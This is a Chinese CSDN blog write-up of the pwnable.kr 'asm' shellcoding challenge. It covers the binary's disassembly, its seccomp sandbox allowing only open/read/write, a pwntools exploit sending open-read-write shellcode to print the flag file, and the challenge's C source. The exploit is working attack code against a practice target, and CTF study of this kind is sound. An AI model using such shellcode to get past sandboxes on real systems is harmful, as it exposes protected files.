pwnablekr-asm-seccomp-sandbox

已于 2022-03-21 21:28:30 修改
阅读量1.6k 收藏
点赞数
分类专栏: bin 文章标签: 安全
于 2022-03-21 20:35:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Ga4ra/article/details/123645373
版权

文章目录

1. 基本信息

file:

$ file asm
asm: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=d7401f94b1d6bf6a5afe4b8a9457e71faa2eb5e9, not stripped

注意是64位程序,context要设置arch=‘amd64’

checksec:

$ checksec asm
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled

反汇编

工具使用ida

sandbox:

text:0000000000000C50                 public sandbox
.text:0000000000000C50 sandbox         proc near               ; CODE XREF: main+13A↓p
.text:0000000000000C50
.text:0000000000000C50 seccomp_ctx     = qword ptr -8
.text:0000000000000C50
.text:0000000000000C50 ; __unwind {
.text:0000000000000C50                 push    rbp
.text:0000000000000C51                 mov     rbp, rsp
.text:0000000000000C54                 sub     rsp, 10h
.text:0000000000000C58                 mov     edi, 0
.text:0000000000000C5D                 call    _seccomp_init
.text:0000000000000C62                 mov     [rbp+seccomp_ctx], rax
.text:0000000000000C66                 cmp     [rbp+seccomp_ctx], 0
.text:0000000000000C6B                 jnz     short loc_C83
.text:0000000000000C6D                 lea     rdi, s          ; "seccomp error"
.text:0000000000000C74                 call    _puts
.text:0000000000000C79                 mov     edi, 0          ; status
.text:0000000000000C7E                 call    _exit
.text:0000000000000C83 ; ---------------------------------------------------------------------------
.text:0000000000000C83
.text:0000000000000C83 loc_C83:                                ; CODE XREF: sandbox+1B↑j
.text:0000000000000C83                 mov     rax, [rbp+seccomp_ctx]
.text:0000000000000C87                 mov     ecx, 0
.text:0000000000000C8C                 mov     edx, 2          ; open
.text:0000000000000C91                 mov     esi, 7FFF0000h
.text:0000000000000C96                 mov     rdi, rax
.text:0000000000000C99                 mov     eax, 0
.text:0000000000000C9E                 call    _seccomp_rule_add
.text:0000000000000CA3                 mov     rax, [rbp+seccomp_ctx]
.text:0000000000000CA7                 mov     ecx, 0
.text:0000000000000CAC                 mov     edx, 0          ; read
.text:0000000000000CB1                 mov     esi, 7FFF0000h
.text:0000000000000CB6                 mov     rdi, rax
.text:0000000000000CB9                 mov     eax, 0
.text:0000000000000CBE                 call    _seccomp_rule_add
.text:0000000000000CC3                 mov     rax, [rbp+seccomp_ctx]
.text:0000000000000CC7                 mov     ecx, 0
.text:0000000000000CCC                 mov     edx, 1          ; write
.text:0000000000000CD1                 mov     esi, 7FFF0000h
.text:0000000000000CD6                 mov     rdi, rax
.text:0000000000000CD9                 mov     eax, 0
.text:0000000000000CDE                 call    _seccomp_rule_add
.text:0000000000000CE3                 mov     rax, [rbp+seccomp_ctx]
.text:0000000000000CE7                 mov     ecx, 0
.text:0000000000000CEC                 mov     edx, 3Ch  	  ; exit
.text:0000000000000CF1                 mov     esi, 7FFF0000h
.text:0000000000000CF6                 mov     rdi, rax
.text:0000000000000CF9                 mov     eax, 0
.text:0000000000000CFE                 call    _seccomp_rule_add
.text:0000000000000D03                 mov     rax, [rbp+seccomp_ctx]
.text:0000000000000D07                 mov     ecx, 0
.text:0000000000000D0C                 mov     edx, 0E7h       ; exit_group
.text:0000000000000D11                 mov     esi, 7FFF0000h
.text:0000000000000D16                 mov     rdi, rax
.text:0000000000000D19                 mov     eax, 0
.text:0000000000000D1E                 call    _seccomp_rule_add


.text:0000000000000D23                 mov     rax, [rbp+seccomp_ctx]
.text:0000000000000D27                 mov     rdi, rax
.text:0000000000000D2A                 call    _seccomp_load
.text:0000000000000D2F                 test    eax, eax
.text:0000000000000D31                 jns     short loc_D55
.text:0000000000000D33                 mov     rax, [rbp+seccomp_ctx]
.text:0000000000000D37                 mov     rdi, rax
.text:0000000000000D3A                 call    _seccomp_release
.text:0000000000000D3F                 lea     rdi, s          ; "seccomp error"
.text:0000000000000D46                 call    _puts
.text:0000000000000D4B                 mov     edi, 0          ; status
.text:0000000000000D50                 call    _exit
.text:0000000000000D55 ; ---------------------------------------------------------------------------

main:

.text:0000000000000D64 ; int __cdecl main(int argc, const char **argv, const char **envp)
.text:0000000000000D64                 public main
.text:0000000000000D64 main            proc near               ; DATA XREF: _start+1D↑o
.text:0000000000000D64
.text:0000000000000D64 var_20          = qword ptr -20h
.text:0000000000000D64 var_14          = dword ptr -14h
.text:0000000000000D64 input           = dword ptr -0Ch
.text:0000000000000D64 buf             = qword ptr -8
.text:0000000000000D64
.text:0000000000000D64 ; __unwind {
.text:0000000000000D64                 push    rbp
.text:0000000000000D65                 mov     rbp, rsp
.text:0000000000000D68                 sub     rsp, 20h
.text:0000000000000D6C                 mov     [rbp+var_14], edi
.text:0000000000000D6F                 mov     [rbp+var_20], rsi
.text:0000000000000D73                 mov     rax, cs:stdout_ptr
.text:0000000000000D7A                 mov     rax, [rax]
.text:0000000000000D7D                 mov     ecx, 0          ; n
.text:0000000000000D82                 mov     edx, 2          ; modes
.text:0000000000000D87                 mov     esi, 0          ; buf
.text:0000000000000D8C                 mov     rdi, rax        ; stream
.text:0000000000000D8F                 call    _setvbuf
.text:0000000000000D94                 mov     rax, cs:stdin_ptr
.text:0000000000000D9B                 mov     rax, [rax]
.text:0000000000000D9E                 mov     ecx, 0          ; n
.text:0000000000000DA3                 mov     edx, 1          ; modes
.text:0000000000000DA8                 mov     esi, 0          ; buf
.text:0000000000000DAD                 mov     rdi, rax        ; stream
.text:0000000000000DB0                 call    _setvbuf        ; 111111111111111111111111111
.text:0000000000000DB5                 lea     rdi, aWelcomeToShell ; "Welcome to shellcoding practice challen"...
.text:0000000000000DBC                 call    _puts
.text:0000000000000DC1                 lea     rdi, aInThisChalleng ; "In this challenge, you can run your x64"...
.text:0000000000000DC8                 call    _puts
.text:0000000000000DCD                 lea     rdi, aTryToMakeShell ; "Try to make shellcode that spits flag u"...
.text:0000000000000DD4                 call    _puts
.text:0000000000000DD9                 lea     rdi, aIfThisDoesNotC ; "If this does not challenge you. you sho"...
.text:0000000000000DE0                 call    _puts
.text:0000000000000DE5                 mov     r9d, 0          ; offset
.text:0000000000000DEB                 mov     r8d, 0          ; fd
.text:0000000000000DF1                 mov     ecx, 32h ; '2'  ; flags
.text:0000000000000DF6                 mov     edx, 7          ; prot
.text:0000000000000DFB                 mov     esi, 1000h      ; len
.text:0000000000000E00                 mov     edi, 41414000h  ; addr
.text:0000000000000E05                 call    _mmap           ; 22222222222222222222222
.text:0000000000000E0A                 mov     [rbp+buf], rax
.text:0000000000000E0E                 mov     rax, [rbp+buf]
.text:0000000000000E12                 mov     edx, 1000h      ; n
.text:0000000000000E17                 mov     esi, 90h        ; c
.text:0000000000000E1C                 mov     rdi, rax        ; s
.text:0000000000000E1F                 call    _memset
.text:0000000000000E24                 lea     rax, stub       ; "H1"
.text:0000000000000E2B                 mov     rdi, rax        ; s
.text:0000000000000E2E                 call    _strlen
.text:0000000000000E33                 mov     rdx, rax        ; n
.text:0000000000000E36                 mov     rax, [rbp+buf]
.text:0000000000000E3A                 lea     rcx, stub       ; "H1"
.text:0000000000000E41                 mov     rsi, rcx        ; src
.text:0000000000000E44                 mov     rdi, rax        ; dest
.text:0000000000000E47                 call    _memcpy         ; 33333333333333333333333333333
.text:0000000000000E4C                 mov     [rbp+input], 2Eh ; '.'
.text:0000000000000E53                 lea     rdi, format     ; "give me your x64 shellcode: "
.text:0000000000000E5A                 mov     eax, 0
.text:0000000000000E5F                 call    _printf
.text:0000000000000E64                 mov     eax, [rbp+input]
.text:0000000000000E67                 movsxd  rdx, eax
.text:0000000000000E6A                 mov     rax, [rbp+buf]
.text:0000000000000E6E                 add     rax, rdx
.text:0000000000000E71                 mov     edx, 3E8h       ; nbytes
.text:0000000000000E76                 mov     rsi, rax        ; buf
.text:0000000000000E79                 mov     edi, 0          ; fd
.text:0000000000000E7E                 call    _read           ; 444444444444444444444444444
.text:0000000000000E83                 mov     edi, 0Ah        ; seconds
.text:0000000000000E88                 call    _alarm
.text:0000000000000E8D                 lea     rdi, path       ; "/home/asm_pwn"
.text:0000000000000E94                 call    _chroot
.text:0000000000000E99                 mov     eax, 0
.text:0000000000000E9E                 call    sandbox         ; 55555555555555555555555555
.text:0000000000000EA3                 mov     rax, [rbp+buf]
.text:0000000000000EA7                 call    rax             ; 666666666666666666666666666666666
.text:0000000000000EA9                 mov     eax, 0
.text:0000000000000EAE                 leave
.text:0000000000000EAF                 retn
.text:0000000000000EAF ; } // starts at D64
.text:0000000000000EAF main            endp

流程梳理

  1. setvbuf 标准输出设置无缓冲, 标准输入设置行缓冲;
  2. mmap申请空间,大小0x1000,可读可写可执行(prot==7),以0x90(nop)填充;
  3. 往申请的空间里拷贝一段数据(因为是可执行的,所以调试时反汇编看一下);
  4. 读取用户输入;
  5. 设置一个定时器,执行chroot切换根目录,执行sandbox,仅允许调用read, write, open;
  6. 执行mmap申请的空间里的代码。

反汇编第三步的数据, 逻辑是清零各个寄存器,无妨:

pwndbg> x /30i 0x5555557560c0
   0x5555557560c0 <stub>:	xor    rax,rax
   0x5555557560c3 <stub+3>:	xor    rbx,rbx
   0x5555557560c6 <stub+6>:	xor    rcx,rcx
   0x5555557560c9 <stub+9>:	xor    rdx,rdx
   0x5555557560cc <stub+12>:	xor    rsi,rsi
   0x5555557560cf <stub+15>:	xor    rdi,rdi
   0x5555557560d2 <stub+18>:	xor    rbp,rbp
   0x5555557560d5 <stub+21>:	xor    r8,r8
   0x5555557560d8 <stub+24>:	xor    r9,r9
   0x5555557560db <stub+27>:	xor    r10,r10
   0x5555557560de <stub+30>:	xor    r11,r11
   0x5555557560e1 <stub+33>:	xor    r12,r12
   0x5555557560e4 <stub+36>:	xor    r13,r13
   0x5555557560e7 <stub+39>:	xor    r14,r14
   0x5555557560ea <stub+42>:	xor    r15,r15

_seccomp_rule_add中的系统调用号参数:

// unistd_64.h
#define __NR_read 0
#define __NR_write 1
#define __NR_open 2
#define __NR_exit 60
#define __NR_exit_group 231

2. 相关知识

seccomp

Seccomp常被用来做沙箱保护,它可以限制/允许一些api的使用。seccomp在ctf中大多用于禁用execve函数(arg_cnt参数为0),解决办法就是构造shellcode,用open->read->write的方式读flag.

安装相关库:

sudo apt install libseccomp-dev libseccomp2 seccomp

Demo可以参考api官网或本题源码。

3. exp

# coding:utf-8
from pwn import *

p = process("./asm")
# gdb.attach()
context(arch='amd64', os='linux')

shellcode = ""
shellcode = shellcraft.amd64.pushstr("this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong")
shellcode += shellcraft.amd64.linux.open('rsp',0,0)
shellcode += shellcraft.read('rax', 'rsp', 100)
shellcode += shellcraft.write(1, 'rsp', 100)

p.recvuntil('shellcode: ')
p.send(asm(shellcode))
print(p.recvline())

执行 sudo python3 exp.py

4. 源码

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <seccomp.h>
#include <sys/prctl.h>
#include <fcntl.h>
#include <unistd.h>

#define LENGTH 128

void sandbox(){
	scmp_filter_ctx ctx = seccomp_init(SCMP_ACT_KILL);
	if (ctx == NULL) {
		printf("seccomp error\n");
		exit(0);
	}

	seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(open), 0);
	seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(read), 0);
	seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(write), 0);
	seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit), 0);
	seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit_group), 0);

	if (seccomp_load(ctx) < 0){
		seccomp_release(ctx);
		printf("seccomp error\n");
		exit(0);
	}
	seccomp_release(ctx);
}

char stub[] = "\x48\x31\xc0\x48\x31\xdb\x48\x31\xc9\x48\x31\xd2\x48\x31\xf6\x48\x31\xff\x48\x31\xed\x4d\x31\xc0\x4d\x31\xc9\x4d\x31\xd2\x4d\x31\xdb\x4d\x31\xe4\x4d\x31\xed\x4d\x31\xf6\x4d\x31\xff";
unsigned char filter[256];
int main(int argc, char* argv[]){

	setvbuf(stdout, 0, _IONBF, 0);
	setvbuf(stdin, 0, _IOLBF, 0);

	printf("Welcome to shellcoding practice challenge.\n");
	printf("In this challenge, you can run your x64 shellcode under SECCOMP sandbox.\n");
	printf("Try to make shellcode that spits flag using open()/read()/write() systemcalls only.\n");
	printf("If this does not challenge you. you should play 'asg' challenge :)\n");

	char* sh = (char*)mmap(0x41414000, 0x1000, 7, MAP_ANONYMOUS | MAP_FIXED | MAP_PRIVATE, 0, 0);
	memset(sh, 0x90, 0x1000);
	memcpy(sh, stub, strlen(stub));
	
	int offset = sizeof(stub);
	printf("give me your x64 shellcode: ");
	read(0, sh+offset, 1000);

	alarm(10);
	chroot("/home/asm_pwn");	// you are in chroot jail. so you can't use symlink in /tmp
	sandbox();
	((void (*)(void))sh)();
	return 0;
}

5. 参考文章

seccomp的学习_瓦雪子的博客-CSDN博客_

seccomp(2) - Linux manual page (man7.org)

setbuf(3) - Linux manual page (man7.org)

C 库函数 – setvbuf() | 菜鸟教程 (runoob.com)

mmap(3p) - Linux manual page (man7.org)

Seccomp从0到1 - 安全客,安全资讯平台 (anquanke.com)

pwnlib.shellcraft.amd64 — Shellcode for AMD64 — pwntools 4.7.0 documentation

CodeStarr
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
seccomp-tools:提供用于seccomp分析的强大工具
04-06
Asm-编写seccomp规则是如此简单! mu-模拟seccomp规则。 支持多架构。 安装 在RubyGems.org上可用! $ gem install seccomp-tools 如果编译时失败,请尝试: sudo apt install gcc ruby-dev 并再次安装seccomp-...
通过pwnable.kr从零学pwn
giantbranch的专栏
07-31 1万+
本文链接:http://blog.csdn.net/u012763794/article/details/51992512 下面的这个地址很多ctf的学习资源都是有推荐的 挑战地址:http://pwnable.kr/play.php fd 首先不用说给了就直接连上去 看一下代码 重要函数:read ssize_t read(int fd,void *
pwn-随机计算题类型
IT_huanhuan的博客
05-25 1119
沙盒机制也就是我们常说的沙箱,英文名sandbox,是计算机领域的虚拟技术,常见于安全方向。一般说来,我们会将不受信任的软件放在沙箱中运行,一旦该软件有恶意行为,则禁止该程序的进一步运行,不会对真实系统造成任何危害。在ctf比赛中,pwn题中的沙盒一般都会限制execve的系统调用,这样一来one_gadget和system调用都不好使,**只能采取open/read/write的组合方式来读取flag。
Sec-comp机制简介及编程案例
最新发布
李老板的移动安全杂货铺
12-03 1158
然后,我们使用`seccomp_rule_add()`函数添加了一些允许的系统调用,例如`open()`、`read()`、`write()`和`close()`。然后,我们使用`seccomp_load()`函数加载seccomp过滤器,`prctl()`函数将本进程设置为seccomp模式,并运行了“she'll”进程(你可以将路径更改为she'll进程的正确路径)。seccomp机制的优点是可以有效地限制应用程序的权限和可执行的系统调用,减少了恶意代码的攻击面,提高了系统的安全性。
使用 pam module 与 seccomp 技术禁止用户加载内核模块
龙瑜的博客
08-21 793
在从 manual 中学习 seccomp 技术这篇文章中,我谈及了使用 seccomp 让用户无法加载内核模块的功能,在本文中尝试写个简单的 demo 来验证下可行性。
pwn -- 沙盒机制详解
lifanxin的博客
05-13 6388
沙盒机制详解概述开启沙盒的两种方式prctl函数调用seccomp库函数使用seccomp-tools识别沙盒两道例题pwnable_asm参考博客总结 概述   沙盒机制也就是我们常说的沙箱,英文名sandbox,是计算机领域的虚拟技术,常见于安全方向。一般说来,我们会将不受信任的软件放在沙箱中运行,一旦该软件有恶意行为,则禁止该程序的进一步运行,不会对真实系统造成任何危害。   在ctf比赛中,pwn题中的沙盒一般都会限制execve的系统调用,这样一来one_gadget和system调用都不好使,只
fc-ae-asm协议(光纤通道航空环境)
05-26
FC-AE-ASM协议,全称为Fibre Channel - Avionics Environment Application Specific Method,是针对航空电子设备在光纤通道(Fibre Channel)网络环境中通信的一种特定应用方法。该协议是为了解决航空电子系统中数据...
spring-asm-3.1.0.RELEASE.jar
11-06
这是spring-asm-3.1.0.RELEASE.jar,为了使用方便传上来.
FC-AE-ASM-AMV1.4.pdf
07-27
FC-AE-ASM协议
使用Verilog-ASM建模常用的模型库
03-18
Verilog-ASM,全称是Verilog Assembly,是一种在Verilog HDL(硬件描述语言)基础上的低级门级建模方法,常用于系统级和门级仿真,特别是在设计验证和IP核验证中。它提供了更精细的控制,使得设计师能够更精确地描述...
seccomp介绍
热门推荐
mashimiao的专栏
06-22 2万+
什么是seccomp seccomp(全称securecomputing mode)是linuxkernel从2.6.23版本开始所支持的一种安全机制。 在Linux系统里,大量的系统调用(systemcall)直接暴露给用户态程序。但是,并不是所有的系统调用都被需要,而且不安全的代码滥用系统调用会对系统造成安全威胁。通过seccomp,我们限制程序使用某些系统调用,这样可以减少系统的暴露面,
Sandbox安全机制 —— 使用 seccomp
SongyangJi
12-10 3461
2021SC@SDUSC
pwnable.kr pwn题题解
qq_41071646的博客
04-10 754
没错 我又来了 开了新坑。。。。。 虽然 说不搞pwn了 但是搞了。。。 gogogo 第一题 挺简单的题。。。。 然后我们 看一下 目录都有什么 如果 能够 读到 flag 那就是另外一个故事了。。 行吧 代码审计吧。。。。 read 第一个参数 0的话 是输入 2是 输出 那么 让fd=0 然后让buf 等于那个值就行 很简单的...
pwnable-asm
网安星空
02-09 1456
pwnable.kr是一个经典的CTF中PWN方向练习的专业网站,本文记录的题目是asm,主要考察的是shellcode的使用。
安全计算模式 seccomp_rule_add(3) 规则 使用文档
凌云俯瞰
03-19 3476
名称 seccomp_rule_add, seccomp_rule_add_exact - Add a seccomp filter rule 简介 #include <seccomp.h> typedef void * scmp_filter_ctx; int SCMP_SYS(syscall_name); struct ...
pwnable.kr [asm]
shisuan1的博客
12-26 370
pwnable.kr [asm] #include &lt;stdio.h&gt; #include &lt;string.h&gt; #include &lt;stdlib.h&gt; #include &lt;sys/mman.h&gt; #include &lt;seccomp.h&gt; #include &lt;sys/prctl.h&gt; #include &lt;fcntl.h&g
BUUCTF Pwn pwnable_asm
ChaoYue_miku的博客
07-10 357
64位ELF 开启了沙箱,允许使用open()、read()、write()三个函数。  主要逻辑基本都在main函数当中,首先用函数映射出一块内存空间,起始地址为,大小为。  flag文件位于相同根目录下,可以利用这一函数试探文件名既具体位置。 核心思想是利用首先利用函数打开flag,然后利用函数将flag读入刚才映射好的内存空间中,最后利用函数写flag到屏幕上即可。根据刚才的分析,可以编写如下的 0x03 运行exp 本地调试好之后,远程连接靶场,运行flag{7be081e2-506e-423
QEMU System环境
Starr
04-06 3763
文章目录1. 安装2. 网络配置关于tap网卡3. 其它使用方法4. 参考资料 文档:https://www.qemu.org/docs/master/ Wiki: https://wiki.qemu.org/Main_Page Qemu Mips文档:https://www.qemu.org/docs/master/system/target-mips.html 1. 安装 本文以mips小端版本为例: sudo apt install qemu-system-mipsel -y 然后下载mips的内核
png隐写
Starr
03-01 3307
文章目录1. PNG格式2. 功能设计3. 读取并解析png验证magic解析main4. 编码payload 隐写:将信息植入其它数据,并可以提取出来。 仅关键逻辑提供源码。 1. PNG格式 PNG官网介绍了png的文件格式,可供参考。 也可以用010editor的png模板。 简述一下,首先是8字节magic: 89 50 4E 47 0D 0A 1A 0A 直接用uint64表示即可: type Header struct { magic uint64 // 0:8 } 然后是块(chunk
fc-ae-asm标准
08-30
FC-AE-ASM(Fibre Channel - Atomic Services and Mapping)是一种用于高性能存储网络的标准。它定义了一种协议,用于在存储网络中传输数据和管理服务。 FC-AE-ASM标准的设计目标是提供一种基于光纤通道(Fibre ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值